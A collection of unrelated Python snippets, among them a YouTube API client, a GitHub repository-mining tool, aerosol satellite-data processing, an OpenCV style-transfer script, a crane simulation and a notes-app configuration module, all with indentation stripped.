data = self.getXml("1",'/xsd.aspx?type=%s' % mtype)
return data
def getCompanyNodeID(self,cn):
nata = self.apicompany()
for i in nata:
if cn == i["Name"]:
return i["NodeId"]
def getCompanyID(self,cn):
ndata = self.apicompany()
for i in ndata:
if cn == i["Name"]:
return i["Id"]
def getPreReport(self,cn):
fd = []
data = {"seq":[]}
id = self.getCompanyID(cn)
if id == None:
return None
else:
ls = self.report(mtype="list",args="companyid=%s" % id)
for b in ls.iter(tag = "Job"):
data["id"] = b.attrib.get("ID")
data["name"] = b.attrib.get("Name")
for c in b.iter(tag="Sequence"):
mylist = {}
mylist["id"] = c.attrib.get("ID")
mylist["start"] = c[0].text
mylist["end"] = c[1].text
data["seq"].append(mylist)
fd.append(data)
data = {"seq":[]}
return fd
def getReportQueue(self,jid,sid):
ls = self.report(mtype="queue",args="jobid=%s&seqnumber=%s" % (jid,sid))
return ls.find("RequestKey").text
def getReport(self,guid):
ls = self.report(mtype="download",args="guid=%s" % guid)
return ls
|
symb_rem = ['AABA','DJ30', 'HKG50', 'SGCG.DE','HKG50','ETO.L','SHPG','CELG','ECA','AKS','LK','UTX','AKRX','FTR',
'JCP','BRK.B','GNC','ASNA','CHK','SPN','OGZDL.RU','AGN','MYL','WUBA','SE.ST','HTZ','DF','XLM','TMK',
'CHINA50','NSDQ100','KVW.NV','AUS200','GEBN.ZU','CYBG.L','DLPH','WORKS','AMTD','ETFC','CELG','AKS',
'USDPLN','HMMJ','DSNKY','TVIX']
print('\nsymbols to be removed')
print(symb_rem)
|
import time
n = list(range(1, 6))[::-1]
def insertionSort(n):
for i in range(1, len(n), 1):
key = n[i]
j = i - 1
while j >= 0 and key < n[j]:
n[j+1] = n[j]
j -= 1
n[j+1] = key
print("ARRAY : {0}".format(n))
return n
start = time.perf_counter()
print("ARRAY BEFORE SORT : {0}".format(n))
print("ARRAY AFTER SORT : {0}".format(insertionSort(n)))
print()
print("Time needed : {0}".format(time.perf_counter() - start))
|
import json
import argparse
from abstraction.abstraction import AbstractionManager
from dataset_creation.dataset_mining import DatasetMining
from token_extraction.token_extraction import TokenExtraction
from utils.settings import init_global
def read_file(filepath): # read generic file
try:
with open(filepath, encoding="utf-8") as f:
content = f.readlines()
c_ = list()
for c in content:
r = c.rstrip("\n").rstrip("\r")
c_.append(r)
except Exception as e:
print("Error ReadFile: " + str(e))
c_ = []
return c_
def process_json_file(filepath: str, start: int, end: int, do_abstraction: bool = False):
json_file = filepath
file_data = read_file(json_file)
data = json.loads(file_data[0])
items = (data["items"])[start:end]
print(len(items))
# for i, item in enumerate(items):
# print(i, item)
file_name = "results.json"
from utils.logger import Logger
log = Logger("logger.log")
from repoManager.repo import Repo
from datetime import datetime
print(datetime.now())
for i, item in enumerate(items):
try:
print("Processed {} repositories of out {}".format(i + 1, len(items)))
repo_name = item["name"]
repo_commit = item["lastCommitSHA"]
repo_url = "https://github.com/{}".format(repo_name)
print(repo_url)
r = Repo(repo_name, repo_url, repo_commit, start + i, do_abstraction)
r.clone_repo("cloning_folder")
r.add_files()
for f in r.files:
for m in f.methods:
m.check_conditions()
from repoManager.store import Store
store = Store()
store.export_data(r)
except Exception as e:
print("ERROR {}".format(e))
print(datetime.now())
def analyse_results(parameter):
from result_analysis.analysis import Analysis
a = Analysis()
a.count_repos()
result, result_global = a.count_file_and_method(*parameter)
from repoManager.store import FileManager
f = FileManager("analysis.txt")
f.open_file_txt("w+")
for k in result.keys():
f.write_file_txt("{}: {}".format(k, result[k]))
f.close_file()
f = FileManager("analysis_global.txt")
f.open_file_txt("w+")
for k in result_global.keys():
f.write_file_txt("{}: {}".format(k, result_global[k]))
f.close_file()
print(result)
print(result_global)
def abstract_results(parameter):
abstraction_class = AbstractionManager(*parameter)
abstraction_class.abstract_mined_repos()
def export_query(parameter):
dataset_mining = DatasetMining(*parameter)
dataset_mining.export_dataset_sql()
def extract_tokens(parameter):
t = TokenExtraction(*parameter)
t.tokenized_mined_repos()
def export_mask():
from repoManager.store import Store
store = Store()
store.export_mask_files()
def fix_condition_id():
'''
In the first version of the tool, we saved a wrong ID field for conditions.
With this code we can fix this bug
'''
from repoManager.store import FileManager
import utils.settings as settings
import os
import shutil
'''
using all csv file generated during methods and conditions abstraction, it is able to abstract all the repos
'''
f = FileManager("export/repo_info.csv")
repo_dict = f.read_csv()
repos_name = repo_dict["NAME"]
repos_id = repo_dict["ID"]
for id, name in zip(repos_id, repos_name):
f = FileManager("export/{}/file_info.csv".format(id))
file_dict = f.read_csv()
if len(file_dict.keys()) == 0:
continue
file_ids = file_dict["ID"]
settings.logger.info("logging repo {} - {}".format(id, name))
for file_id in file_ids:
method_path = "export/{}/{}/method_info.csv".format(id, file_id)
f = FileManager(method_path)
method_dict = f.read_csv()
if len(method_dict.keys()) == 0:
continue
method_ids = method_dict["ID"]
settings.logger.info("logging file {}".format(file_id))
for method_id in method_ids:
condition_path = "export/{}/{}/{}/condition_info.csv".format(id, file_id, method_id)
f = FileManager(condition_path)
condition_dict = f.read_csv()
if len(condition_dict.keys()) == 0:
continue
if not os.path.exists(condition_path + "__BACKUP"):
shutil.copy(condition_path, condition_path + "__BACKUP")
fields_condition = ["ID", "START", "END", "IS_OK", "TYPE"]
c = FileManager(condition_path)
# we want to force the creation of the header (the file already exists so we'll skip the header otherwise)
c.open_file_csv("w+", fields_condition, force_write_header=True)
num_conditions = len(condition_dict["ID"])
for i in range(num_conditions):
values_conditions = list()
for field in fields_condition:
values_conditions.append(condition_dict[field][i])
values_conditions[0] = str(i)
dict_row = dict()
for x, y in zip(fields_condition, values_conditions):
dict_row[x] = y
c.write_file_csv(dict_row)
c.close_file()
def T5_pretrain(parameter, num_max):
dataset_mining = DatasetMining(*parameter, num_max)
dataset_mining.export_dataset_T5_pretrain()
def main():
init_global("logger.log")
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--start", type=int, default=0,
help="The start index for repositories to process")
parser.add_argument("-e", "--end", type=int, default=999999,
help="The end index for repositories to process")
parser.add_argument("-f", "--filepath", type=str, default="json_data/results.json",
help="The path of json file")
parser.add_argument("-c", "--conditions", action="store_true",
help="clone the repositories in the json @filepath and check for all conditions")
parser.add_argument("-a", "--analysis", action="store_true",
help="analyze the results")
parser.add_argument("-do_abstraction_during_check", "--do_abstraction_during_check", action="store_true",
help="abstract methods during condition processing")
parser.add_argument("-abs", "--abstract", action="store_true",
help="abstract methods based on repo_info.csv and parameters (see --parameter)")
parser.add_argument("-exp", "--export_query", action="store_true",
help="export all methods in a sql file")
parser.add_argument("-m", "--mask", action="store_true",
help="export all masked files")
parser.add_argument("-fix", "--fix", action="store_true",
help="fix condition file (wrong ID originally reported)")
parser.add_argument("-t5_pretrain", "--t5_pretrain", action="store_true",
help="create files for T5 pretrain")
parser.add_argument("-num_max", "--num_max", type=int, default=1500,
help="maximum number of methods extracted from the same repo for T5_pretrain")
parser.add_argument("-p", "--parameter", type=str, default="0_9999999_0_9999999",
help="default parameters for analysis and abstraction. You have to write min number of tokens, max number of tokens,"
"min number of lines and max number of lines, separated by a underscore(_). If you do not want to specify"
"one of the parameters, put None")
parser.add_argument("-t", "--tokens", action="store_true",
help="save tokens")
args = parser.parse_args()
if args.conditions:
# -c -s 4 -e 7 -f json_data/results.json
process_json_file(args.filepath, args.start, args.end, args.do_abstraction_during_check)
parameter_input = args.parameter.split("_")
if len(parameter_input) != 4:
print("ERROR: NUMBER OF PARAMETER IS NOT CORRECT")
return
parameter_default = [0, 9999999, 0, 9999999]
parameter_list = list()
for default, value in zip(parameter_default, parameter_input):
if value.lower() == "none":
parameter_list.append(default)
continue
curr = int(value)
parameter_list.append(curr)
if args.analysis:
analyse_results(parameter_list)
if args.abstract:
# -abs -p 0_100_5_15
abstract_results(parameter_list)
if args.export_query:
# -exp -p 0_100_5_15
export_query(parameter_list)
if args.tokens:
extract_tokens(parameter_list)
if args.mask:
export_mask()
if args.fix:
fix_condition_id()
if args.t5_pretrain:
num_max=args.num_max
T5_pretrain(parameter_list, num_max)
if __name__ == "__main__":
main()
|
for i in range(0, 10, 1):
print(i)
print "Cero!"
|
from pyhdf.SD import SD
import hdf4
import scipy.io
import numpy as np
import formatNum as fN
import re
import pandas as pd
import extract
import update
from collections import namedtuple
header_file_aerosol = '../../projects/aerosol/products/MIL2ASAE/'
header_data = '../../projects/aerosol/cache/data/'
PixelData = namedtuple('PixelData', 'reg smart')
def reg_smart(date, path, orbit, block, r):
from constant import COMPONENT_NUM
reg_dat = _reg_dat(date, path, orbit, block, r)
optical_properties = particle(date, path, orbit)
reg_is_used = reg_dat['reg'][0, 0]['reg_is_used'].T
y, x = np.where(reg_is_used)
ind_used = np.ravel(reg_dat['reg'][0, 0]['ind_used'], order='F') - 1
num_reg_used = reg_dat['reg'][0, 0]['num_reg_used'][0][0]
channel_is_used = reg_dat['reg'][0, 0]['channel_is_used']
min_equ_ref = reg_dat['reg'][0, 0]['min_equ_ref']
mean_equ_ref = reg_dat['reg'][0, 0]['mean_equ_ref']
eof = reg_dat['reg'][0, 0]['eof']
max_usable_eof = reg_dat['reg'][0, 0]['max_usable_eof'] - 1
ss = reg_dat['smart'][0, 0]['ss']
ms = reg_dat['smart'][0, 0]['ms']
Q = get_q(r)
i2d, j2d = np.nonzero(Q)
reg_is_used = np.ravel(reg_is_used)
mask = np.bool_(reg_is_used[i2d] & reg_is_used[j2d] & np.not_equal(i2d, j2d))
i = ind_used[i2d[mask]]
j = ind_used[j2d[mask]]
tau0 = aod(date, path, orbit, block)
tau = np.mean(tau0)*np.ones(num_reg_used)
theta = 1.0/COMPONENT_NUM * np.ones((COMPONENT_NUM, num_reg_used), dtype=float)
return x, y, i, j, num_reg_used, tau, theta, channel_is_used, min_equ_ref, mean_equ_ref, eof, max_usable_eof, ss, ms, optical_properties
def particle(date, path, orbit):
file_aerosol = _MIL2ASAE_fname(date, path, orbit)
f = hdf4.HDF4_root(file_aerosol)
str_table = f.children['Component Particle Information'].attr['Component Particle Properties - Summary Table'].value
p1 = re.compile('Part 2 *').search(str_table).start()
p2 = re.compile('Shape types:*').search(str_table).start()
str_dat = str_table[p1:p2].split('\n')[8:92]
optical_properties = np.array([map(float, re.compile('(\s\s+)').sub(',', x).split(',')[4:6]) for x in str_dat])
return optical_properties
def aod(date, path, orbit, block):
from constant import BAND_GREEN
file_aerosol = _MIL2ASAE_fname(date, path, orbit)
f = SD(file_aerosol)
tau0 = f.select('RegMeanSpectralOptDepth').get()[block-1 , : , :, BAND_GREEN]
tau0[tau0 == -9999] = np.mean(tau0[tau0 != -9999])
return tau0
def _reg_dat(date, path, orbit, block, r):
file_mat = _reg_mat_fname(date, path, orbit, block, r) # use matlab block number
dat = scipy.io.loadmat(file_mat)
return dat
def get_q(r):
dat = scipy.io.loadmat('prec.mat')
if r == 4400:
return dat['Q_4400']
elif r == 1100:
return dat['Q_1100']
else:
print 'resolution not implemented!'
def _MIL2ASAE_fname(date, path, orbit):
orbit = fN.orbit2str(orbit)
path = fN.path2str(path)
from constant import HEADER_MIL2ASAE_FILENAME
dir_aerosol = header_file_aerosol + date
file_aerosol = dir_aerosol + '/' + HEADER_MIL2ASAE_FILENAME + path + '_O' + orbit + '_F12_0022.hdf'
return str(file_aerosol)
def _reg_mat_fname(date, path, orbit, block, r):
orbit = fN.orbit2str(orbit)
path = fN.path2str(path)
return str(header_data + date + '_P' + path + '_O' + orbit + '_B' + str(block) + '_R' + str(r) + '.mat')
def merge_dict(file_xls, r):
xls = pd.ExcelFile(file_xls)
sheet_name = xls.sheet_names[0]
df = xls.parse(sheet_name)
dates = list(df['Dates'][5:6])
paths = list(df['Paths'][5:6])
orbits = list(df['Orbits'][5:6])
blocks = list(df['Blocks'][5:6])
dict_data0 = []
dict_param0 =[]
dict_neigh0 = []
dict_env0 = []
N = len(dates)
optical_properties0 = [[]] * N
num_reg_used0 = [0] * N
i0 = [[]] * N
j0 = [[]] * N
for d in xrange(N):
date = dates[d]
path = paths[d]
orbit = orbits[d]
block = blocks[d]
x, y, i, j, num_reg_used, tau, theta, channel_is_used, min_equ_ref, mean_equ_ref, eof, max_usable_eof, ss, ms, optical_properties = \
reg_smart(date, path, orbit, block, r)
dict_data, dict_param = get_data_param(date, path, orbit, block,\
x, y, num_reg_used, tau, theta, channel_is_used, min_equ_ref, mean_equ_ref, eof, max_usable_eof, ss, ms, optical_properties, r)
dict_neigh = update.get_neigh(date, path, orbit, block, i, j, num_reg_used)
dict_env = update.get_env_block(tau, theta, num_reg_used, dict_neigh)
dict_data0 = dict_data0 + dict_data
dict_param0 = dict_param0 + dict_param
dict_neigh0 = dict_neigh0 + dict_neigh
dict_env0 = dict_env0 + dict_env
optical_properties0[d] = optical_properties
num_reg_used0[d] = num_reg_used
i0[d] = i
j0[d] = j
print date + " dictionary is done!"
return dict_data0, dict_param0, dict_neigh0, dict_env0, optical_properties0, num_reg_used0, i0, j0, dates, paths, orbits, blocks
def get_data_param(date, path, orbit, block, x, y, num_reg_used, tau, theta, channel_is_used, min_equ_ref, mean_equ_ref, eof, max_usable_eof, ss, ms, optical_properties, r):
ps = xrange(num_reg_used)
keys = [fN.get_key(date, path, orbit, block, p) for p in ps]
dict_data = []
dict_param = []
for p in ps:
tau_p = tau[p]
theta_p = theta[:, p]
reg_p, smart_p = extract.pixel(x[p], y[p], channel_is_used, min_equ_ref, mean_equ_ref, eof, max_usable_eof, ss, ms, r)
_, _, resid_p = update.get_resid(tau_p, theta_p, reg_p, smart_p, optical_properties, r)
dict_data.append((keys[p], PixelData(reg_p, smart_p)))
dict_param.append((keys[p], update.PixelParam(tau_p, theta_p, resid_p)))
return dict_data, dict_param
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ˅
from behavioral_patterns.interpreter.node import Node
# ˄
class CommandList(Node):
# ˅
# ˄
def __init__(self):
self.__nodes = []
# ˅
pass
# ˄
def parse(self, context):
# ˅
# Write here to avoid circular import errors.
from behavioral_patterns.interpreter.command import Command
while True:
if context.get_token() is None:
exit('ERROR: Missing \'end\'')
elif context.get_token() == 'end':
context.slide_token(token='end')
break
else:
_node = Command()
_node.parse(context)
self.__nodes.append(_node.to_string()) # Hold the parsed node
# ˄
def to_string(self):
# ˅
return f'[{", ".join(self.__nodes)}]'
# ˄
# ˅
# ˄
# ˅
# ˄
|
import requests
import app_config as app_config
import json
base_url = 'https://youtube.googleapis.com/youtube/v3/'
channels_url = base_url + 'channels'
playlist_url = base_url + 'playlistItems'
search_url = base_url + 'search'
videos_url = base_url + 'videos'
ht = '%23'
pipe = '%7C'
verbose = True
def make_response(status, message):
response_data = {
'status': status,
'message': message
}
return json.dumps(response_data)
def make_success(message):
return make_response('success', message)
def make_fail(message):
return make_response('fail', message)
def make_error(message):
return make_response('error', message)
def get_video_url(id):
return 'https://www.youtube.com/watch?v=' + id
def get_channel_url(id):
return 'https://www.youtube.com/channel/' + id
def get_channel_by_id(id):
channel = {}
data = {
'part': 'snippet,contentDetails',
'id': id,
'key': app_config.YOUTUBE_API_KEY,
'fields': 'items(id,contentDetails/relatedPlaylists/uploads,snippet(title,description,publishedAt,thumbnails/high/url))'
}
r = requests.get(channels_url, params=data).json()
try:
item = r['items'][0]
snippet = item.get('snippet', 'N/A')
details = item.get('contentDetails', 'N/A')
if snippet != 'N/A':
channel['channel_title'] = snippet.get('title', 'N/A')
channel['channel_description'] = snippet.get('description', 'N/A')
channel['channel_id'] = item.get('id', 'N/A')
channel['channel_url'] = 'https://www.youtube.com/channel/' + channel['channel_id']
channel['channel_thumbnail_url'] = snippet.get('thumbnails', 'N/A').get('high', 'N/A').get('url', 'N/A')
if details != 'N/A':
channel['channel_uploads_playlist'] = details.get('relatedPlaylists', 'N/A').get('uploads', 'N/A')
return channel
except:
make_error("Failed to get channel from Youtube API")
def get_uploads_by_id(id, pages=1, max_count=5):
uploads = []
next_page_token = ''
for x in range(0, pages):
if verbose:
print('Page {} of {}'.format(str(x), str(pages)))
data = {
'part': 'snippet',
'playlistId': id,
'maxResults': max_count,
'key': app_config.YOUTUBE_API_KEY,
'fields': 'nextPageToken,items(id,snippet(title,description,channelId,channelTitle,publishedAt,resourceId/videoId,thumbnails/high/url))'
}
if next_page_token != '':
data['pageToken'] = next_page_token
r = requests.get(playlist_url, params=data).json()
try:
for item in r['items']:
video = {}
snippet = item.get('snippet', 'N/A')
if snippet != 'N/A':
video['video_title'] = snippet.get('title', 'N/A')
video['video_description'] = snippet.get('description', 'N/A')
video['video_id'] = snippet.get('resourceId', 'N/A').get('videoId', 'N/A')
video['video_url'] = 'https://www.youtube.com/watch?v=' + video['video_id']
video['playlistItemId'] = item.get('id', 'N/A')
video['published_data'] = snippet.get('publishedAt', 'N/A')
video['thumbnail'] = snippet.get('thumbnails', 'N/A').get('high', 'N/A').get('url', 'N/A')
video['channel_title'] = snippet.get('channelTitle', 'N/A')
video['channel_id'] = snippet.get('channelId', 'N/A')
video['channel_url'] = 'https://www.youtube.com/channel/' + video['channel_id']
uploads.append(video)
next_page_token = r.get('nextPageToken', 'N/A')
if next_page_token == 'N/A':
print("No more pages")
break
except:
return ['Youtube API Error']
return uploads
def get_video_by_id(video_id):
video = {}
data = {
'part': 'snippet,statistics,player',
'id': video_id,
'key': app_config.YOUTUBE_API_KEY,
'fields': 'items(id,snippet(title,description,channelId,channelTitle,publishedAt,thumbnails/high/url,tags),statistics(viewCount,likeCount,dislikeCount,commentCount),player/embedHtml)'
}
r = requests.get(videos_url, params=data).json()
try:
items = r['items'][0]
snippet = items.get('snippet', 'N/A')
statistics = items.get('statistics', 'N/A')
player = items.get('player', 'N/A')
if snippet != 'N/A':
video['video_title'] = snippet.get('title', 'N/A')
video['video_description'] = snippet.get('description', 'N/A')
video['video_id'] = items.get('id', 'N/A')
video['video_url'] = 'https://www.youtube.com/watch?v=' + video['video_id']
video['video_tags'] = snippet.get('tags', [])
video['video_published_date'] = snippet.get('publishedAt', 'N/A')
video['video_thumbnail_url'] = snippet.get('thumbnails', 'N/A').get('high', 'N/A').get('url', 'N/A')
video['channel_title'] = snippet.get('channelTitle', 'N/A')
video['channel_id'] = snippet.get('channelId', 'N/A')
video['channel_url'] = 'https://www.youtube.com/channel/' + video['channel_id']
if statistics != 'N/A':
video['video_views'] = statistics.get('viewCount', 'N/A')
video['video_likes'] = statistics.get('likeCount', 'N/A')
video['video_dislikes'] = statistics.get('dislikeCount', 'N/A')
video['video_comments'] = statistics.get('commentCount', 'N/A')
return video
except:
return make_error('Failed to get video from Youtube API')
def search_videos(query, pages=1, max_count=50, start_token='', sort_by='relevance', language_relevance=True, additional_fields={}):
videos = []
next_page_token = start_token
for x in range(0, pages):
print('Page {} of {}'.format(str(x + 1), str(pages)))
data = {
'part': 'snippet',
'id': id,
'q': query,
'maxResults': max_count,
'safeSearch': 'none',
'type': 'video',
'key': app_config.YOUTUBE_API_KEY,
'order': sort_by,
'fields': 'nextPageToken,items(id/videoId,snippet(title,description,channelId,channelTitle,publishedAt,thumbnails/high/url))'
}
if language_relevance:
data['relevanceLanguage'] = 'en'
for k in additional_fields:
data[k] = additional_fields[k]
if next_page_token != '':
data['pageToken'] = next_page_token
r = requests.get(search_url, params=data).json()
# print(str(r))
try:
for item in r['items']:
video = {}
snippet = item.get('snippet', 'N/A')
if snippet != 'N/A':
video['video_title'] = snippet.get('title', 'N/A')
video['video_description'] = snippet.get('description', 'N/A')
video['video_id'] = item.get('id', 'N/A').get('videoId', 'N/A')
video['video_url'] = 'https://www.youtube.com/watch?v=' + video['video_id']
video['video_published_date'] = snippet.get('publishedAt', 'N/A')
video['video_thumbnail_url'] = snippet.get('thumbnails', 'N/A').get('high', 'N/A').get('url', 'N/A')
video['channel_title'] = snippet.get('channelTitle', 'N/A')
video['channel_id'] = snippet.get('channelId', 'N/A')
video['channel_url'] = 'https://www.youtube.com/channel/' + video['channel_id']
videos.append(video)
next_page_token = r.get('nextPageToken', 'N/A')
if next_page_token == 'N/A':
print("No more pages")
file = open('./next.txt', 'w+', encoding='utf-8')
file.write('')
file.close()
break
else:
file = open('./next.txt', 'w+', encoding='utf-8')
file.write(str(next_page_token))
file.close()
except:
print('Youtube API Error: {}'.format(str(r)))
break
return videos
|
import argparse
import time
import os
import subprocess
import cv2 as cv
import numpy as np
FLAGS = None
VID = 'video'
IMG = 'image'
meanX = 103.939
meanY = 116.779
meanZ = 123.680
def nothing(v):
print('hello ' + v)
def predict_all(img, values, h, w):
blob = cv.dnn.blobFromImage(img, 1.0, (w, h),
(meanX, meanY, meanZ), swapRB=False, crop=False)
sum = 0
for value in values:
sum += value
out = cv.normalize(img, None, 0, 255, cv.NORM_MINMAX, cv.CV_8U)
if sum == 0:
return out
weights = []
for value in values:
weights.append(value / sum)
num_models = 0
for i in range(0, len(nets)):
if weights[i] != 0:
net = nets[i]
print ("[INFO] Applying model " + str(i) + ", weight: " + str(weights[i]))
if num_models == 0:
out = predict(blob, net, h, w) * weights[i]
else:
out += predict(blob, net, h, w) * weights[i]
num_models = num_models + 1
return out
def predict(blob, net, h, w):
print ('[INFO] Setting the input to the model')
net.setInput(blob)
print ('[INFO] Starting Inference!')
start = time.time()
out = net.forward()
end = time.time()
print ('[INFO] Inference Completed successfully!')
# Reshape the output tensor and add back in the mean subtraction, and
# then swap the channel ordering
out = out.reshape((3, out.shape[2], out.shape[3]))
out[0] += meanX
out[1] += meanY
out[2] += meanZ
out /= 255.0
out = out.transpose(1, 2, 0)
# Printing the inference time
if FLAGS.print_inference_time:
print ('[INFO] The model ran in {:.4f} seconds'.format(end-start))
return out
# Source for this function:
# https://github.com/jrosebr1/imutils/blob/4635e73e75965c6fef09347bead510f81142cf2e/imutils/convenience.py#L65
def resize_img(img, width=None, height=None, inter=cv.INTER_AREA):
dim = None
h, w = img.shape[:2]
if width is None and height is None:
return img
elif width is None:
r = height / float(h)
dim = (int(w * r), height)
elif height is None:
r = width / float(w)
dim = (width, int(h * r))
resized = cv.resize(img, dim, interpolation=inter)
return resized
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--model-path',
type=str,
default='./models/instance_norm/',
help='The model directory.')
parser.add_argument('-i', '--image',
type=str,
help='Path to the image.')
parser.add_argument('-md', '--model',
type=str,
help='The file path to the direct model.\
If this is specified, the model-path argument is \
not considered.')
parser.add_argument('--show-original-image',
type=bool,
default=False,
help='Whether or not to show the original image')
parser.add_argument('--save-image-with-name',
type=str,
default='stylizedimage.png',
help='The path to save the generated stylized image \
only when in image mode.')
parser.add_argument('--download-models',
type=bool,
default=False,
help='If set to true all the pretrained models are downloaded, \
using the script in the downloads directory.')
parser.add_argument('--print-inference-time',
type=bool,
default=False,
help='If set to True, then the time taken for the model is output \
to the console.')
FLAGS, unparsed = parser.parse_known_args()
# download models if needed
if FLAGS.download_models:
subprocess.call(['./models/download.sh'])
# Set the mode image/video based on the argparse
if FLAGS.image is None:
mode = VID
else:
mode = IMG
# Check if there are models to be loaded and list them
models = []
for f in sorted(os.listdir(FLAGS.model_path)):
if f.endswith('.t7'):
models.append(f)
if len(models) == 0:
raise Exception('The model path doesn\'t contain models')
# Load the neural style transfer model
path = FLAGS.model_path + ('' if FLAGS.model_path.endswith('/') else '/')
print (path + models[0])
print ('[INFO] Loading the model...')
total_models = len(os.listdir(FLAGS.model_path))
nets = []
for model in models:
model_to_load = path + model
nets.append(cv.dnn.readNetFromTorch(model_to_load))
print ('[INFO] Model Loaded successfully!')
# Loading the image depending on the type
if mode == VID:
pass
cv.namedWindow("Real-time Video")
cv.moveWindow("Real-time video", 400, 0)
cv.namedWindow("Preview")
cv.moveWindow("Preview", 0, 0)
vid = cv.VideoCapture(0)
while True:
_, frame = vid.read()
img = resize_img(frame, width=400)
h, w = img.shape[:2]
cv.imshow("Real-time Video", img)
fValues = open("values.txt", "rt")
lines = fValues.read().splitlines()
fValues.close()
values = []
svalues = lines[0].split(';')
for i in range(0,6):
values.append(int(svalues[i]))
out = predict_all(img, values, h, w)
cv.imshow('Preview', out)
if os.path.exists("./shoot"):
os.system("rm -f shoot")
frame_normed = 255 * (out - out.min()) / (out.max() - out.min())
frame_normed = np.array(frame_normed, np.int)
cv.imwrite("./picture.jpg", frame_normed)
key = cv.waitKey(1) & 0xFF
if key == ord('q'):
break
elif key == ord('n') and FLAGS.model is None:
model_loaded_i = (model_loaded_i + 1) % total_models
model_to_load = path + models[model_loaded_i]
net = cv.dnn.readNetFromTorch(model_to_load)
elif key == ord('p') and FLAGS.model is None:
model_loaded_i = (model_loaded_i - 1) % total_models
model_to_load = path + models[model_loaded_i]
net = cv.dnn.readNetFromTorch(model_to_load)
vid.release()
cv.destroyAllWindows()
elif mode == IMG:
print ('[INFO] Reading the image')
img = cv.imread(FLAGS.image)
print ('[INFO] Image Loaded successfully!')
img = resize_img(img, width=600)
h, w = img.shape[:2]
# Get the output from the pretrained model
out = predict(img, h, w)
# show the image
if FLAGS.show_original_image:
cv.imshow('Input Image', img)
cv.imshow('Stylized image', out)
meanX += 50
meanY += 50
meanZ += 50
out2 = predict(img, h, w)
cv.imshow('Stylized image 2', out2)
meanX -= 100
meanY -= 100
meanZ -= 100
out3 = predict(img, h, w)
cv.imshow('Stylized image 3', out3)
model_to_load = path + models[1]
net = cv.dnn.readNetFromTorch(model_to_load)
out4 = predict(img, h, w)
cv.imshow('Stylized image 4', out4)
out5 = (out + out4) * 0.5
cv.imshow('Stylized image 5', out5)
print ('[INFO] Hit Esc to close!')
cv.waitKey(0)
if FLAGS.save_image_with_name is not None:
cv.imwrite(FLAGS.save_image_with_name, out)
|
import warnings
warnings.simplefilter("ignore", UserWarning)
# Import the necessary python library modules
import numpy as np
from matplotlib import pyplot as plt
from scipy.optimize import minimize
import os
import sys
import pdb
# Add my local path to the relevant modules list
sys.path.append('/Users/Daniel/Github/Crawlab-Student-Code/Daniel Newman/Python Modules')
# Import my python modules
import InputShaping as shaping
import Boom_Crane as BC
import Generate_Plots as genplt
import si
# Use lab plot style
plt.style.use('Crawlab')
# define constants
DEG_TO_RAD = np.pi / 180
G = 9.81
Boom=0.81
Cable=0.30
Amax=174.0
Vmax=17.4
Luff_vals = np.array([60.,30.])
Tmax=5.0
Tstep=0.01
normalized_amp=0.8
phase=90.
Startt=np.array([0.])
p = BC.init_crane( Boom,
Cable,
Amax,
Vmax,
Luff_vals,
Tmax,
Tstep,
normalized_amp,
phase,
Startt=Startt
)
[Amax,Vmax], l, r, StartTime, t_step,t,X0,Distance = p
pd_response = BC.response(p,['Feedback'],feedback_control='PD')
unshaped_response = BC.response(p,['Unshaped'])
# Determine the folder where the plots will be saved
folder = 'Figures/{}/Luff_{}_{}'.format(
sys.argv[0],
Luff_vals[0],Luff_vals[1],
)
genplt.compare_responses(t,
pd_response[:,0],'PD',
unshaped_response[:,0],'Unshaped',
name_append='Swing',
xlabel='Time (s)',ylabel='Swing Angle (deg)',
folder=folder,grid=False,save_data=False
)
genplt.compare_responses(t,
pd_response[:,2],'PD',
unshaped_response[:,2],'Unshaped',
name_append='Displacement',
xlabel='Time (s)',ylabel='Luff Angle (deg)',
folder=folder,grid=False,save_data=False
)
genplt.compare_responses(t,
pd_response[:,3],'PD',
unshaped_response[:,3],'Unshaped',
name_append='Velocity',
xlabel='Time (s)',ylabel='Luff Velocity (deg/s)',
folder=folder,grid=False,save_data=False
) |
import os
import copy
import json
import logging
from typing import Optional, TypedDict, NewType
from shorthand.types import ExecutablePath, FilePath, DirectoryPath, RelativeDirectoryPath
class ShorthandFrontendConfig(TypedDict):
view_history_limit: int
map_tileserver_url: str
class ShorthandConfig(TypedDict):
notes_directory: DirectoryPath
cache_directory: DirectoryPath
default_directory: Optional[RelativeDirectoryPath]
log_file_path: FilePath
log_level: str
log_format: str
grep_path: ExecutablePath
find_path: ExecutablePath
frontend: ShorthandFrontendConfig
class ShorthandConfigUpdates(TypedDict, total=False):
cache_directory: DirectoryPath
default_directory: Optional[RelativeDirectoryPath]
log_file_path: FilePath
log_level: str
log_format: str
grep_path: ExecutablePath
find_path: ExecutablePath
frontend: ShorthandFrontendConfig
CONFIG_FILE_LOCATION = '/etc/shorthand/shorthand_config.json'
DEFAULT_NOTES_DIR = '/var/lib/shorthand/notes'
DEFAULT_CACHE_DIR = '/var/lib/shorthand/cache'
DEFAULT_LOG_FILE = '/var/log/shorthand/shorthand.log'
DEFAULT_LOG_FORMAT = '%(asctime)s %(name)s %(levelname)-8s %(message)s'
DEFAULT_LOG_LEVEL = 'INFO'
DEFAULT_GREP_PATH = 'grep'
DEFAULT_FIND_PATH = 'find'
DEFAULT_FRONTEND_CONFIG: ShorthandFrontendConfig = {
'view_history_limit': 100,
'map_tileserver_url': 'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png'
}
DEFAULT_CONFIG: ShorthandConfig = {
"notes_directory": DEFAULT_NOTES_DIR,
"cache_directory": DEFAULT_CACHE_DIR,
"default_directory": None,
"log_file_path": DEFAULT_LOG_FILE,
"log_level": DEFAULT_LOG_LEVEL,
"log_format": DEFAULT_LOG_FORMAT,
"grep_path": DEFAULT_GREP_PATH,
"find_path": DEFAULT_FIND_PATH,
"frontend": DEFAULT_FRONTEND_CONFIG
}
REQUIRED_FIELDS = ['notes_directory']
log = logging.getLogger(__name__)
def _get_notes_config(config_location: FilePath = CONFIG_FILE_LOCATION
) -> ShorthandConfig:
'''Get notes config from the file path specified
returns the loaded, cleaned, and validated config
'''
if '~' in config_location:
config_location = os.path.expanduser(config_location)
if not os.path.exists(config_location):
raise ValueError(f'Config file {config_location} does not exist')
with open(config_location, 'r') as env_config_file:
notes_config = json.load(env_config_file)
notes_config = clean_and_validate_config(notes_config)
return notes_config
def _write_config(config_location: FilePath, config: ShorthandConfig) -> None:
'''Write the specified config into a config file
'''
